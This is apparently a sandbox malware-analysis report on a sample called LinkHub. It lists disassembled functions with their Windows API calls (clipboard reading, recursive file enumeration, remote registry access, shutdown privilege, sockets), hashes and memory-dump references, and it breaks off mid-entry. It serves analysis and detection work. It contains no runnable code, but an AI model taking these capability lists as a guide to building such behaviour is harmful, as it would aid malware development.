Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: bb2e5d856994b76a2210ad06bf0991ed47fd895d6228cf141ae11938352a45ac
Instruction ID: c074ed7b24b32957a3b76189518efadc491968f0a127604ce0d67243cc5376f6
Opcode Fuzzy Hash: bb2e5d856994b76a2210ad06bf0991ed47fd895d6228cf141ae11938352a45ac
Instruction Fuzzy Hash: 12718AB2A00209AFDF109FA6EC49FAEBFB8BF04354F084159E915B6191D7719A05CBA0

Function 00E4F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00E6DCD0), ref: 00E4F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00E4F594
GetClipboardData.USER32(0000000D), ref: 00E4F5A0
CloseClipboard.USER32 ref: 00E4F5AC
GlobalLock.KERNEL32(00000000), ref: 00E4F5E4
CloseClipboard.USER32 ref: 00E4F5EE
GlobalUnlock.KERNEL32(00000000), ref: 00E4F619
IsClipboardFormatAvailable.USER32(00000001), ref: 00E4F626
GetClipboardData.USER32(00000001), ref: 00E4F62E
GlobalLock.KERNEL32(00000000), ref: 00E4F63F
GlobalUnlock.KERNEL32(00000000), ref: 00E4F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00E4F695
GetClipboardData.USER32(0000000F), ref: 00E4F6A1
GlobalLock.KERNEL32(00000000), ref: 00E4F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E4F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E4F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E4F72F
GlobalUnlock.KERNEL32(00000000), ref: 00E4F750
CountClipboardFormats.USER32 ref: 00E4F771
CloseClipboard.USER32 ref: 00E4F7B6

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 28203686da1da3c509be07f6a22ea2e14eaea02557610dc6c39eec0b635b5c59
Instruction ID: 9cb61e7f26d1dfcc9741267737593aa5f10c663401f0c30a9ae80f2621b35822
Opcode Fuzzy Hash: 28203686da1da3c509be07f6a22ea2e14eaea02557610dc6c39eec0b635b5c59
Instruction Fuzzy Hash: CE61E2312042019FD300EF20EC98F6AB7E4EF84B48F55546EF446A72A2DB75ED49CB61

Function 00E473D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E47403
FindClose.KERNEL32(00000000), ref: 00E47457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E47493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E474BA

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00E474F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E47524

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00E475AF
%03d, xrefs: 00E477E7
%4d, xrefs: 00E475F6
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00E47577
%02d, xrefs: 00E47645, 00E4764F, 00E4769F, 00E476EF, 00E4773F, 00E4778F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: f98d85f97440f948b7c5bfef974f045f74abb6c75cc25536f88fb34e920a31cf
Instruction ID: de3d1da12a48884a9eb9f9c2ce22d11e3288ff34b3cb4c1cab5c1e3d36ef0312
Opcode Fuzzy Hash: f98d85f97440f948b7c5bfef974f045f74abb6c75cc25536f88fb34e920a31cf
Instruction Fuzzy Hash: 0ED15F72508344AEC714EB65C891EBBB7ECEF88704F44091EF585D6291EB74DA48CBB2

Function 00E4A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E4A0A8
GetFileAttributesW.KERNEL32(?), ref: 00E4A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00E4A100
FindNextFileW.KERNEL32(00000000,?), ref: 00E4A118
FindClose.KERNEL32(00000000), ref: 00E4A123
FindFirstFileW.KERNEL32(*.*,?), ref: 00E4A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00E4A18F
SetCurrentDirectoryW.KERNEL32(00E97B94), ref: 00E4A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E4A1B7
FindClose.KERNEL32(00000000), ref: 00E4A1C4
FindClose.KERNEL32(00000000), ref: 00E4A1D4

Strings

*.*, xrefs: 00E4A13A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: e9c3988f28db08c7af693e2b09ef59d7a63335206301a777dc80921aa6beb2cf
Instruction ID: 51d809e19f1f76b66e243e9446f7d9dcc32e797f677b4c31eb5e739712dce77f
Opcode Fuzzy Hash: e9c3988f28db08c7af693e2b09ef59d7a63335206301a777dc80921aa6beb2cf
Instruction Fuzzy Hash: 4231E371A4521D6FDB10AFA5FC49ADF73AC9F04374F045065E914F22A0EB70DE488A21

Function 00E44763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E44785
_wcslen.LIBCMT ref: 00E447B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E447E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E44803
RemoveDirectoryW.KERNEL32(?), ref: 00E44813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E4489A
CloseHandle.KERNEL32(00000000), ref: 00E448A5
CloseHandle.KERNEL32(00000000), ref: 00E448B0

Strings

\, xrefs: 00E447BC
:, xrefs: 00E447C7
\??\%s, xrefs: 00E447A0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: b77c7231dd2c298fcccb14fbfa8a48add23451b213347e22136a22d5c2db8574
Instruction ID: 729679580ad1e581cd11a6e95b5ba8d4faff568e4abb563b6c0af8284687b4f1
Opcode Fuzzy Hash: b77c7231dd2c298fcccb14fbfa8a48add23451b213347e22136a22d5c2db8574
Instruction Fuzzy Hash: 3431A5B1A04149ABDB219FA1EC49FEB37BDEF89744F5040B6F609E21A0E77096448B24

Function 00E4A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E4A203
FindNextFileW.KERNEL32(00000000,?), ref: 00E4A25E
FindClose.KERNEL32(00000000), ref: 00E4A269
FindFirstFileW.KERNEL32(*.*,?), ref: 00E4A285
SetCurrentDirectoryW.KERNEL32(?), ref: 00E4A2D5
SetCurrentDirectoryW.KERNEL32(00E97B94), ref: 00E4A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E4A2FD
FindClose.KERNEL32(00000000), ref: 00E4A30A
FindClose.KERNEL32(00000000), ref: 00E4A31A

Part of subcall function 00E3E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E3E3B4

Strings

*.*, xrefs: 00E4A280

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: d5adbe02c6ca2eaaf43b3312253290a9d7f3d0113dc3da1587d26ca667e8d63c
Instruction ID: 78443cd0b9e35d0c1bbd58d4e516caac98ce547e14b1f507c587c58a352f628d
Opcode Fuzzy Hash: d5adbe02c6ca2eaaf43b3312253290a9d7f3d0113dc3da1587d26ca667e8d63c
Instruction Fuzzy Hash: BC31243164420D6ECF10AFA1FC09ADE77AC9F45378F185061F910B31A0EBB1DE89DA25

Function 00E5C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E5D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E5C10E,?,?), ref: 00E5D415
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D451
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4C8
Part of subcall function 00E5D3F8: _wcslen.LIBCMT ref: 00E5D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E5C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00E5CA09
RegCloseKey.ADVAPI32(00000000), ref: 00E5CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E5CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E5CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E5CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E5CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00E5CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E5CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E5CDE2
RegCloseKey.ADVAPI32(00000000), ref: 00E5CDEF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: b32a3b3ea03d50a1156ac4bfa7da83e14bdc55bc4013346d06d4e2b1e75119f1
Instruction ID: 9acf93c06f1a2c89c3af7521de6890898608dec2963c7ed5d161f2351407f6d9
Opcode Fuzzy Hash: b32a3b3ea03d50a1156ac4bfa7da83e14bdc55bc4013346d06d4e2b1e75119f1
Instruction Fuzzy Hash: 00022C716043009FD714DF24C895E2ABBE5EF88318F19989DF84ADB2A2D731ED46CB61

Function 00E3D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD55D1,?,?,00E14B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DD5871

Part of subcall function 00E3EAB0: GetFileAttributesW.KERNEL32(?,00E3D840), ref: 00E3EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00E3D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E3DA88
MoveFileW.KERNEL32(?,?), ref: 00E3DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E3DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E3DAE2

Part of subcall function 00E3DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E3DAC7,?,?), ref: 00E3DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00E3DAFE
FindClose.KERNEL32(00000000), ref: 00E3DB0F

Strings

\*.*, xrefs: 00E3D978, 00E3D981, 00E3D996

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 568b2cf173f6e57548520f3c2f6dd27f9f7f3ca3c5ba3000565548242b5c9874
Instruction ID: a9b36b392e1aca486ae2386a8314622eec256df67c68cc2c82858e9783fe1bd7
Opcode Fuzzy Hash: 568b2cf173f6e57548520f3c2f6dd27f9f7f3ca3c5ba3000565548242b5c9874
Instruction Fuzzy Hash: FC613E3190910DAECF05EBA0EE56AEDBBB9EF14314F6041A6E40677291DB719F09CB70

Function 00E4F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00E4F7EE
EmptyClipboard.USER32 ref: 00E4F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00E4F809
CloseClipboard.USER32 ref: 00E4F900

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d3ccab7296b03c138c851bc3e89923b64e14c9af75572ce686189892229361a9
Instruction ID: 745412e8d589d3e1ca8ef3d5d6151d89f945a0f31429eee1ce377c6ea4e6a6de
Opcode Fuzzy Hash: d3ccab7296b03c138c851bc3e89923b64e14c9af75572ce686189892229361a9
Instruction Fuzzy Hash: 2F419F31A04601AFD714DF16E888B1A7BE4EF48758F14C4A9E419AF762CB75EC45CBA0

Function 00E3F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00E32010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E3205A
Part of subcall function 00E32010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E32087
Part of subcall function 00E32010: GetLastError.KERNEL32 ref: 00E32097

ExitWindowsEx.USER32(?,00000000), ref: 00E3F249

Strings

@, xrefs: 00E3F23C
SeShutdownPrivilege, xrefs: 00E3F219
, xrefs: 00E3F237
, xrefs: 00E3F273

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 835ec025ad7c754c55957f4f6e6f2944b046b988d39920e49d4232d030a1436a
Instruction ID: 52f5cdfe5b529c450544c0eba9f106dd14377e3653c92023a13a1d57afb1d248
Opcode Fuzzy Hash: 835ec025ad7c754c55957f4f6e6f2944b046b988d39920e49d4232d030a1436a
Instruction Fuzzy Hash: 5701DB7AF14210AFEB1462B8AC8DFFB7AAC9B08394F551535FD02F21E2D5605D04D550

Function 00DD22AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00DD233E
GetSysColor.USER32(0000000F), ref: 00DD2421
SetBkColor.GDI32(?,00000000), ref: 00DD2434

Strings

(, xrefs: 00DD240A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Color$Proc
String ID: (
API String ID: 929743424-2063206799
Opcode ID: 9e69c70899b8355e606cd51bddd548e96f83113d6a21552f542715673b96deb5
Instruction ID: 78ed6e04cd97c8e597b8fcde3abdc5db3a5ca4edda05e8f63a81b1c9b73bb03a
Opcode Fuzzy Hash: 9e69c70899b8355e606cd51bddd548e96f83113d6a21552f542715673b96deb5
Instruction Fuzzy Hash: 238139B0208000BDE628663D5C98EBF299EDB62354B15011FF142F6BD6C96ADF829276

Function 00E43A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E156C2,?,?,00000000,00000000), ref: 00E43A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E156C2,?,?,00000000,00000000), ref: 00E43A35
LoadResource.KERNEL32(?,00000000,?,?,00E156C2,?,?,00000000,00000000,?,?,?,?,?,?,00DD66CE), ref: 00E43A45
SizeofResource.KERNEL32(?,00000000,?,?,00E156C2,?,?,00000000,00000000,?,?,?,?,?,?,00DD66CE), ref: 00E43A56
LockResource.KERNEL32(00E156C2,?,?,00E156C2,?,?,00000000,00000000,?,?,?,?,?,?,00DD66CE,?), ref: 00E43A65

Strings

SCRIPT, xrefs: 00E43A2B

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f119baf04b77102323f694376b24aab8115b656f477a4ce0d5a68bf9a5a9364e
Instruction ID: a52a58359c8805fc9edc5f727cfdc6cad53ffe0fe113083aa8d79060b79d914b
Opcode Fuzzy Hash: f119baf04b77102323f694376b24aab8115b656f477a4ce0d5a68bf9a5a9364e
Instruction Fuzzy Hash: 3B117C70A40701BFD7258B26EC48F277BB9EBC5B54F14426CF452E65A0DBB1DD049620

Function 00E320AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E31916
Part of subcall function 00E31900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E31922
Part of subcall function 00E31900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E31931
Part of subcall function 00E31900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E31938
Part of subcall function 00E31900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E3194E

GetLengthSid.ADVAPI32(?,00000000,00E31C81), ref: 00E320FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E32107
HeapAlloc.KERNEL32(00000000), ref: 00E3210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00E32127
GetProcessHeap.KERNEL32(00000000,00000000,00E31C81), ref: 00E3213B
HeapFree.KERNEL32(00000000), ref: 00E32142

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: cdf9fe53a19ca8ea56b05f644ee9fd5fd10f5d8e8ea9359f0b13ba1f81f000a5
Instruction ID: ee053cdd7a888cc35b83ca1574165a32175718980802a74a4bd5a007aae0f185
Opcode Fuzzy Hash: cdf9fe53a19ca8ea56b05f644ee9fd5fd10f5d8e8ea9359f0b13ba1f81f000a5
Instruction Fuzzy Hash: 2A11AC71A02204FFDB149BA5ED09BAF7FB9EF45399F54801CEA81B7120C7B59948CB60

Function 00E4A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E4A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E4A6D0

Part of subcall function 00E442B9: GetInputState.USER32 ref: 00E44310
Part of subcall function 00E442B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E443AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E4A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E4A6BA

Strings

*.*, xrefs: 00E4A5A2

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: ad2b960091f97f5594bae17f3e2ab13ae915c97ba084bde19c0435c22f832695
Instruction ID: 0f9896f73c6de7c5fcf76f2136bee4d03094561bc3d3b9265740a6f0d1ebf36d
Opcode Fuzzy Hash: ad2b960091f97f5594bae17f3e2ab13ae915c97ba084bde19c0435c22f832695
Instruction Fuzzy Hash: 9541827194020AAFDF10DF64DD45AEEBBB4EF04324F1950A6E405B32A1EB709E44CF61

Function 00E52263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E53AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E53AD7
Part of subcall function 00E53AAB: _wcslen.LIBCMT ref: 00E53AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E522BA
WSAGetLastError.WSOCK32 ref: 00E522E1
bind.WSOCK32(00000000,?,00000010), ref: 00E52338
WSAGetLastError.WSOCK32 ref: 00E52343
closesocket.WSOCK32(00000000), ref: 00E52372

Memory Dump Source

